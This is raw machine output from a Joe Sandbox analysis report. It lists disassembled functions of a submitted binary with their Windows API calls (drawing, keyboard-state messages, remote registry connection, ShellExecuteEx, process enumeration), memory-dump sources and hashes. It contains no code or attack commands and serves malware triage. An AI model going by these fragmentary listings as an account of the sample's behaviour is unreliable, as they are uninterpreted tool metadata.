                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3488606520-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 288456094-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004449B0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00444BA9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00457C34
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00457CE8
                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1325244542-1426351568
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004737F6
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
